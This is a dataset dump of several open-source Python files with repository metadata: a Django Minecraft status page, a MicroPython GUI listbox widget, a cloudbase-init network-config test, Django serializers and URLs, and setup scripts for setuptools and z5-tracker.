from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
file_config=RcLocalFileConfig()):
super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
def add_boot_item(self, cmd, name):
if not name:
raise NameNotValidException("name not valid while adding boot item")
if not cmd:
raise SettingNotValidException("setting not valid while adding boot item")
def add_multi_line_setting(self, name, value):
pass
| true | true |
f72ecf9d4483c1074b236e04b5a5c073a285db26 | 1,233 | py | Python | MinecraftServer/views.py | TN-1/ServerStatus | fcb9a2bddf06cc83edfb7fcf7b7535d22ff6f6bf | [
"MIT"
] | null | null | null | MinecraftServer/views.py | TN-1/ServerStatus | fcb9a2bddf06cc83edfb7fcf7b7535d22ff6f6bf | [
"MIT"
] | null | null | null | MinecraftServer/views.py | TN-1/ServerStatus | fcb9a2bddf06cc83edfb7fcf7b7535d22ff6f6bf | [
"MIT"
] | null | null | null | from django.shortcuts import render
from mcstatus import MinecraftServer
from MinecraftServer.models import MCServer, Admin
# Create your views here.
def index(request):
server = []
status = []
servers = MCServer.objects.all()
for srv in servers:
server.append(srv)
try:
if srv.IPaddress:
mcsrv = MinecraftServer("%s" % srv.IPaddress, int(srv.port))
status.append(mcsrv.status())
elif srv.domain:
mcsrv = MinecraftServer("%s" % srv.domain, int(srv.port))
status.append(mcsrv.status())
else:
status = "Server doesnt contain any addresses. Where am I meant to look? Please contact the admin: " + str(e)
admin = Admin.objects.first()
return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
except Exception, e:
status = "Cant reach the server. Please contact the admin: " + str(e)
admin = Admin.objects.first()
return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
return render(request, 'MinecraftServer/index.html', {'status': status}) | 42.517241 | 125 | 0.605839 | from django.shortcuts import render
from mcstatus import MinecraftServer
from MinecraftServer.models import MCServer, Admin
def index(request):
server = []
status = []
servers = MCServer.objects.all()
for srv in servers:
server.append(srv)
try:
if srv.IPaddress:
mcsrv = MinecraftServer("%s" % srv.IPaddress, int(srv.port))
status.append(mcsrv.status())
elif srv.domain:
mcsrv = MinecraftServer("%s" % srv.domain, int(srv.port))
status.append(mcsrv.status())
else:
status = "Server doesnt contain any addresses. Where am I meant to look? Please contact the admin: " + str(e)
admin = Admin.objects.first()
return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
except Exception, e:
status = "Cant reach the server. Please contact the admin: " + str(e)
admin = Admin.objects.first()
return render(request, 'MinecraftServer/index.html', {'status': status, 'admin': admin})
return render(request, 'MinecraftServer/index.html', {'status': status}) | false | true |
f72ed12b9dd621b1fa7446c773458608d1e04750 | 6,036 | py | Python | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | # listbox.py Extension to ugui providing the Listbox class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2021 Peter Hinch
# 12 Sep 21 Support for scrolling.
from gui.core.ugui import Widget, display
from gui.core.colors import *
dolittle = lambda *_ : None
# Behaviour has issues compared to touch displays because movement between
# entries is sequential. This can affect the choice in when the callback runs.
# It always runs when select is pressed. See 'also' ctor arg.
class Listbox(Widget):
ON_MOVE = 1 # Also run whenever the currency moves.
ON_LEAVE = 2 # Also run on exit from the control.
# This is used by dropdown.py
@staticmethod
def dimensions(writer, elements, dlines):
# Height of a single entry in list.
entry_height = writer.height + 2 # Allow a pixel above and below text
# Number of displayable lines
dlines = len(elements) if dlines is None else dlines
# Height of control
height = entry_height * dlines + 2
textwidth = max(writer.stringlen(s) for s in elements) + 4
return entry_height, height, dlines, textwidth
def __init__(self, writer, row, col, *,
elements,
dlines=None, width=None, value=0,
fgcolor=None, bgcolor=None, bdcolor=False,
fontcolor=None, select_color=DARKBLUE,
callback=dolittle, args=[], also=0):
e0 = elements[0]
# Check whether elements specified as (str, str,...) or ([str, callback, args], [...)
if isinstance(e0, tuple) or isinstance(e0, list):
self.els = elements # Retain original for .despatch
self.elements = [x[0] for x in elements] # Copy text component
if callback is not dolittle:
raise ValueError('Cannot specify callback.')
self.cb = self.despatch
else:
self.cb = callback
self.elements = elements
if any(not isinstance(s, str) for s in self.elements):
raise ValueError('Invalid elements arg.')
# Calculate dimensions
self.entry_height, height, self.dlines, tw = self.dimensions(
writer, self.elements, dlines)
if width is None:
width = tw # Text width
self.also = also
self.ntop = 0 # Top visible line
if not isinstance(value, int):
value = 0 # Or ValueError?
elif value >= self.dlines: # Must scroll
value = min(value, len(elements) - 1)
self.ntop = value - self.dlines + 1
super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
self.cb_args = args
self.select_color = select_color
self.fontcolor = fontcolor
self._value = value # No callback until user selects
self.ev = value # Value change detection
def show(self):
if not super().show(False): # Clear to self.bgcolor
return
x = self.col
y = self.row
eh = self.entry_height
ntop = self.ntop
dlines = self.dlines
nlines = min(dlines, len(self.elements)) # Displayable lines
for n in range(ntop, ntop + nlines):
text = self.elements[n]
if self.writer.stringlen(text) > self.width: # Clip
font = self.writer.font
pos = 0
nch = 0
for ch in text:
pos += font.get_ch(ch)[2] # width of current char
if pos > self.width:
break
nch += 1
text = text[: nch]
if n == self._value:
display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
else:
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
y += eh
# Draw a vertical line to hint at scrolling
x = self.col + self.width - 2
if ntop:
display.vline(x, self.row, eh - 1, self.fgcolor)
if ntop + dlines < len(self.elements):
y = self.row + (dlines - 1) * eh
display.vline(x, y, eh - 1, self.fgcolor)
def textvalue(self, text=None): # if no arg return current text
if text is None:
return self.elements[self._value]
else: # set value by text
try:
v = self.elements.index(text)
except ValueError:
v = None
else:
if v != self._value:
self.value(v)
return v
def _vchange(self, vnew): # A value change is taking place
# Handle scrolling
if vnew >= self.ntop + self.dlines:
self.ntop = vnew - self.dlines + 1
elif vnew < self.ntop:
self.ntop = vnew
self.value(vnew)
if (self.also & Listbox.ON_MOVE): # Treat as if select pressed
self.do_sel()
def do_adj(self, _, val):
v = self._value
if val > 0:
if v:
self._vchange(v -1)
elif val < 0:
if v < len(self.elements) - 1:
self._vchange(v + 1)
# Callback runs if select is pressed. Also (if ON_LEAVE) if user changes
# list currency and then moves off the control. Otherwise if we have a
# callback that refreshes another control, that second control does not
# track currency.
def do_sel(self): # Select was pushed
self.ev = self._value
self.cb(self, *self.cb_args)
def enter(self):
self.ev = self._value # Value change detection
def leave(self):
if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
self.do_sel()
def despatch(self, _): # Run the callback specified in elements
x = self.els[self()]
x[1](self, *x[2])
| 37.962264 | 102 | 0.567594 |
from gui.core.ugui import Widget, display
from gui.core.colors import *
dolittle = lambda *_ : None
class Listbox(Widget):
ON_MOVE = 1
ON_LEAVE = 2
@staticmethod
def dimensions(writer, elements, dlines):
entry_height = writer.height + 2
dlines = len(elements) if dlines is None else dlines
height = entry_height * dlines + 2
textwidth = max(writer.stringlen(s) for s in elements) + 4
return entry_height, height, dlines, textwidth
def __init__(self, writer, row, col, *,
elements,
dlines=None, width=None, value=0,
fgcolor=None, bgcolor=None, bdcolor=False,
fontcolor=None, select_color=DARKBLUE,
callback=dolittle, args=[], also=0):
e0 = elements[0]
if isinstance(e0, tuple) or isinstance(e0, list):
self.els = elements
self.elements = [x[0] for x in elements]
if callback is not dolittle:
raise ValueError('Cannot specify callback.')
self.cb = self.despatch
else:
self.cb = callback
self.elements = elements
if any(not isinstance(s, str) for s in self.elements):
raise ValueError('Invalid elements arg.')
self.entry_height, height, self.dlines, tw = self.dimensions(
writer, self.elements, dlines)
if width is None:
width = tw
self.also = also
self.ntop = 0
if not isinstance(value, int):
value = 0
elif value >= self.dlines:
value = min(value, len(elements) - 1)
self.ntop = value - self.dlines + 1
super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
self.cb_args = args
self.select_color = select_color
self.fontcolor = fontcolor
self._value = value
self.ev = value
def show(self):
if not super().show(False):
return
x = self.col
y = self.row
eh = self.entry_height
ntop = self.ntop
dlines = self.dlines
nlines = min(dlines, len(self.elements))
for n in range(ntop, ntop + nlines):
text = self.elements[n]
if self.writer.stringlen(text) > self.width:
font = self.writer.font
pos = 0
nch = 0
for ch in text:
pos += font.get_ch(ch)[2]
if pos > self.width:
break
nch += 1
text = text[: nch]
if n == self._value:
display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
else:
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
y += eh
x = self.col + self.width - 2
if ntop:
display.vline(x, self.row, eh - 1, self.fgcolor)
if ntop + dlines < len(self.elements):
y = self.row + (dlines - 1) * eh
display.vline(x, y, eh - 1, self.fgcolor)
def textvalue(self, text=None):
if text is None:
return self.elements[self._value]
else:
try:
v = self.elements.index(text)
except ValueError:
v = None
else:
if v != self._value:
self.value(v)
return v
def _vchange(self, vnew):
if vnew >= self.ntop + self.dlines:
self.ntop = vnew - self.dlines + 1
elif vnew < self.ntop:
self.ntop = vnew
self.value(vnew)
if (self.also & Listbox.ON_MOVE):
self.do_sel()
def do_adj(self, _, val):
v = self._value
if val > 0:
if v:
self._vchange(v -1)
elif val < 0:
if v < len(self.elements) - 1:
self._vchange(v + 1)
def do_sel(self):
self.ev = self._value
self.cb(self, *self.cb_args)
def enter(self):
self.ev = self._value
def leave(self):
if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
self.do_sel()
def despatch(self, _):
x = self.els[self()]
x[1](self, *x[2])
| true | true |
f72ed18097959bb4697efab08240d8e8fb10e5cf | 2,166 | py | Python | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 74 | 2015-01-07T17:03:43.000Z | 2022-02-06T17:08:54.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 26 | 2015-02-13T11:32:05.000Z | 2020-11-13T15:02:03.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 40 | 2015-01-22T17:12:03.000Z | 2021-12-09T20:37:35.000Z | # Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
def setUp(self):
date = "2013-04-04"
content = fake_json_response.get_fake_metadata_json(date)
self.data = content["network_config"]["debian_config"]
def _test_parse_nics(self, no_nics=False):
nics = debiface.parse(self.data)
if no_nics:
self.assertFalse(nics)
return
# check what we've got
nic0 = service_base.NetworkDetails(
fake_json_response.NAME0,
fake_json_response.MAC0.upper(),
fake_json_response.ADDRESS0,
fake_json_response.NETMASK0,
fake_json_response.BROADCAST0,
fake_json_response.GATEWAY0,
fake_json_response.DNSNS0.split()
)
nic1 = service_base.NetworkDetails(
fake_json_response.NAME1,
None,
fake_json_response.ADDRESS1,
fake_json_response.NETMASK1,
fake_json_response.BROADCAST1,
fake_json_response.GATEWAY1,
None
)
self.assertEqual([nic0, nic1], nics)
def test_nothing_to_parse(self):
invalid = [None, "", 324242, ("dasd", "dsa")]
for data in invalid:
self.data = data
self._test_parse_nics(no_nics=True)
def test_parse(self):
self._test_parse_nics()
| 33.84375 | 78 | 0.662973 |
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
def setUp(self):
date = "2013-04-04"
content = fake_json_response.get_fake_metadata_json(date)
self.data = content["network_config"]["debian_config"]
def _test_parse_nics(self, no_nics=False):
nics = debiface.parse(self.data)
if no_nics:
self.assertFalse(nics)
return
nic0 = service_base.NetworkDetails(
fake_json_response.NAME0,
fake_json_response.MAC0.upper(),
fake_json_response.ADDRESS0,
fake_json_response.NETMASK0,
fake_json_response.BROADCAST0,
fake_json_response.GATEWAY0,
fake_json_response.DNSNS0.split()
)
nic1 = service_base.NetworkDetails(
fake_json_response.NAME1,
None,
fake_json_response.ADDRESS1,
fake_json_response.NETMASK1,
fake_json_response.BROADCAST1,
fake_json_response.GATEWAY1,
None
)
self.assertEqual([nic0, nic1], nics)
def test_nothing_to_parse(self):
invalid = [None, "", 324242, ("dasd", "dsa")]
for data in invalid:
self.data = data
self._test_parse_nics(no_nics=True)
def test_parse(self):
self._test_parse_nics()
| true | true |
f72ed31f1f958ed758de28189f10278aab1054fa | 727 | py | Python | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | 6 | 2021-03-19T01:06:25.000Z | 2021-09-22T18:47:10.000Z | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
class Meta:
model = BorrowedBook
fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())
class Meta:
model = get_user_model()
fields = ['borrowed_books']
| 34.619048 | 93 | 0.729023 | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
class Meta:
model = BorrowedBook
fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())
class Meta:
model = get_user_model()
fields = ['borrowed_books']
| true | true |
f72ed3a16a6afdb8aef7e5df2b36580380cf2269 | 6,680 | py | Python | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | 2 | 2017-05-23T12:05:28.000Z | 2018-05-08T20:38:23.000Z | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Distutils setup file, used to install or test 'setuptools'
"""
import io
import os
import sys
import textwrap
# Allow to run setup.py from another directory.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
src_root = None
from distutils.util import convert_path
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
exec(init_file.read(), command_ns)
SETUP_COMMANDS = command_ns['__all__']
import setuptools
scripts = []
def _gen_console_scripts():
yield "easy_install = setuptools.command.easy_install:main"
# Gentoo distributions manage the python-version-specific scripts
# themselves, so those platforms define an environment variable to
# suppress the creation of the version-specific scripts.
var_names = (
'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
)
if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
return
yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
.format(shortver=sys.version[:3]))
console_scripts = list(_gen_console_scripts())
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
long_description = readme_file.read()
package_data = {
'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}
force_windows_specific_files = (
os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
not in (None, "", "0")
)
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
or force_windows_specific_files:
package_data.setdefault('setuptools', []).extend(['*.exe'])
package_data.setdefault('setuptools.command', []).extend(['*.xml'])
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
setup_params = dict(
name="setuptools",
version="20.10.1",
description="Easily download, build, install, upgrade, and uninstall "
"Python packages",
author="Python Packaging Authority",
author_email="distutils-sig@python.org",
long_description=long_description,
keywords="CPAN PyPI distutils eggs package management",
url="https://github.com/pypa/setuptools",
src_root=src_root,
packages=setuptools.find_packages(exclude=['*.tests']),
package_data=package_data,
py_modules=['easy_install'],
zip_safe=True,
entry_points={
"distutils.commands": [
"%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
for cmd in SETUP_COMMANDS
],
"distutils.setup_keywords": [
"eager_resources = setuptools.dist:assert_string_list",
"namespace_packages = setuptools.dist:check_nsp",
"extras_require = setuptools.dist:check_extras",
"install_requires = setuptools.dist:check_requirements",
"tests_require = setuptools.dist:check_requirements",
"setup_requires = setuptools.dist:check_requirements",
"entry_points = setuptools.dist:check_entry_points",
"test_suite = setuptools.dist:check_test_suite",
"zip_safe = setuptools.dist:assert_bool",
"package_data = setuptools.dist:check_package_data",
"exclude_package_data = setuptools.dist:check_package_data",
"include_package_data = setuptools.dist:assert_bool",
"packages = setuptools.dist:check_packages",
"dependency_links = setuptools.dist:assert_string_list",
"test_loader = setuptools.dist:check_importable",
"test_runner = setuptools.dist:check_importable",
"use_2to3 = setuptools.dist:assert_bool",
"convert_2to3_doctests = setuptools.dist:assert_string_list",
"use_2to3_fixers = setuptools.dist:assert_string_list",
"use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
],
"egg_info.writers": [
"PKG-INFO = setuptools.command.egg_info:write_pkg_info",
"requires.txt = setuptools.command.egg_info:write_requirements",
"entry_points.txt = setuptools.command.egg_info:write_entries",
"eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
"namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
"top_level.txt = setuptools.command.egg_info:write_toplevel_names",
"depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
"dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
],
"console_scripts": console_scripts,
"setuptools.installation":
['eggsecutable = setuptools.command.easy_install:bootstrap'],
},
classifiers=textwrap.dedent("""
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.6
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Programming Language :: Python :: 3.5
Topic :: Software Development :: Libraries :: Python Modules
Topic :: System :: Archiving :: Packaging
Topic :: System :: Systems Administration
Topic :: Utilities
""").strip().splitlines(),
extras_require={
"ssl:sys_platform=='win32'": "wincertstore==0.2",
"certs": "certifi==2016.2.28",
},
dependency_links=[
'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
],
scripts=[],
tests_require=[
'setuptools[ssl]',
'pytest>=2.8',
] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
setup_requires=[
] + sphinx + pytest_runner + wheel,
)
if __name__ == '__main__':
dist = setuptools.setup(**setup_params)
| 40.240964 | 123 | 0.655689 |
import io
import os
import sys
import textwrap
os.chdir(os.path.dirname(os.path.abspath(__file__)))
src_root = None
from distutils.util import convert_path
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
exec(init_file.read(), command_ns)
SETUP_COMMANDS = command_ns['__all__']
import setuptools
scripts = []
def _gen_console_scripts():
yield "easy_install = setuptools.command.easy_install:main"
var_names = (
'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
)
if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
return
yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
.format(shortver=sys.version[:3]))
console_scripts = list(_gen_console_scripts())
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
long_description = readme_file.read()
package_data = {
'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}
force_windows_specific_files = (
os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
not in (None, "", "0")
)
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
or force_windows_specific_files:
package_data.setdefault('setuptools', []).extend(['*.exe'])
package_data.setdefault('setuptools.command', []).extend(['*.xml'])
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
setup_params = dict(
name="setuptools",
version="20.10.1",
description="Easily download, build, install, upgrade, and uninstall "
"Python packages",
author="Python Packaging Authority",
author_email="distutils-sig@python.org",
long_description=long_description,
keywords="CPAN PyPI distutils eggs package management",
url="https://github.com/pypa/setuptools",
src_root=src_root,
packages=setuptools.find_packages(exclude=['*.tests']),
package_data=package_data,
py_modules=['easy_install'],
zip_safe=True,
entry_points={
"distutils.commands": [
"%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
for cmd in SETUP_COMMANDS
],
"distutils.setup_keywords": [
"eager_resources = setuptools.dist:assert_string_list",
"namespace_packages = setuptools.dist:check_nsp",
"extras_require = setuptools.dist:check_extras",
"install_requires = setuptools.dist:check_requirements",
"tests_require = setuptools.dist:check_requirements",
"setup_requires = setuptools.dist:check_requirements",
"entry_points = setuptools.dist:check_entry_points",
"test_suite = setuptools.dist:check_test_suite",
"zip_safe = setuptools.dist:assert_bool",
"package_data = setuptools.dist:check_package_data",
"exclude_package_data = setuptools.dist:check_package_data",
"include_package_data = setuptools.dist:assert_bool",
"packages = setuptools.dist:check_packages",
"dependency_links = setuptools.dist:assert_string_list",
"test_loader = setuptools.dist:check_importable",
"test_runner = setuptools.dist:check_importable",
"use_2to3 = setuptools.dist:assert_bool",
"convert_2to3_doctests = setuptools.dist:assert_string_list",
"use_2to3_fixers = setuptools.dist:assert_string_list",
"use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
],
"egg_info.writers": [
"PKG-INFO = setuptools.command.egg_info:write_pkg_info",
"requires.txt = setuptools.command.egg_info:write_requirements",
"entry_points.txt = setuptools.command.egg_info:write_entries",
"eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
"namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
"top_level.txt = setuptools.command.egg_info:write_toplevel_names",
"depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
"dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
],
"console_scripts": console_scripts,
"setuptools.installation":
['eggsecutable = setuptools.command.easy_install:bootstrap'],
},
classifiers=textwrap.dedent("""
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.6
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Programming Language :: Python :: 3.5
Topic :: Software Development :: Libraries :: Python Modules
Topic :: System :: Archiving :: Packaging
Topic :: System :: Systems Administration
Topic :: Utilities
""").strip().splitlines(),
extras_require={
"ssl:sys_platform=='win32'": "wincertstore==0.2",
"certs": "certifi==2016.2.28",
},
dependency_links=[
'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
],
scripts=[],
tests_require=[
'setuptools[ssl]',
'pytest>=2.8',
] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
setup_requires=[
] + sphinx + pytest_runner + wheel,
)
if __name__ == '__main__':
dist = setuptools.setup(**setup_params)
| true | true |
f72ed504ee5e9ff505fb85110a267350133c3f82 | 1,023 | py | Python | 4_utilization/utilization/urls.py | LIkelion-at-KOREATECH/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | null | null | null | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | """utilization URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', accounts.views.index, name="index"),
path('accounts/', include('allauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 36.535714 | 77 | 0.723363 | from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', accounts.views.index, name="index"),
path('accounts/', include('allauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| true | true |
f72ed5096c5ea0ad4c05289c8b57172cf413b939 | 665 | py | Python | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 2 | 2019-07-07T00:36:47.000Z | 2020-05-11T10:48:42.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 5 | 2019-02-09T09:58:06.000Z | 2021-04-30T12:59:09.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 1 | 2020-05-09T18:50:48.000Z | 2020-05-09T18:50:48.000Z | import setuptools
setuptools.setup(
name='z5-tracker',
version='1.2.1',
author='Feneg',
description='Helper program for Ocarina of Time randomiser',
url='https://www.github.com/feneg/z5-tracker',
packages=setuptools.find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Topic :: Games/Entertainment',
'Topic :: Utilities'],
entry_points={
'gui_scripts': (
'z5-tracker = z5tracker.main:main',
'z5tracker = z5tracker.main:main')}
)
| 30.227273 | 64 | 0.607519 | import setuptools
setuptools.setup(
name='z5-tracker',
version='1.2.1',
author='Feneg',
description='Helper program for Ocarina of Time randomiser',
url='https://www.github.com/feneg/z5-tracker',
packages=setuptools.find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Topic :: Games/Entertainment',
'Topic :: Utilities'],
entry_points={
'gui_scripts': (
'z5-tracker = z5tracker.main:main',
'z5tracker = z5tracker.main:main')}
)
| true | true |
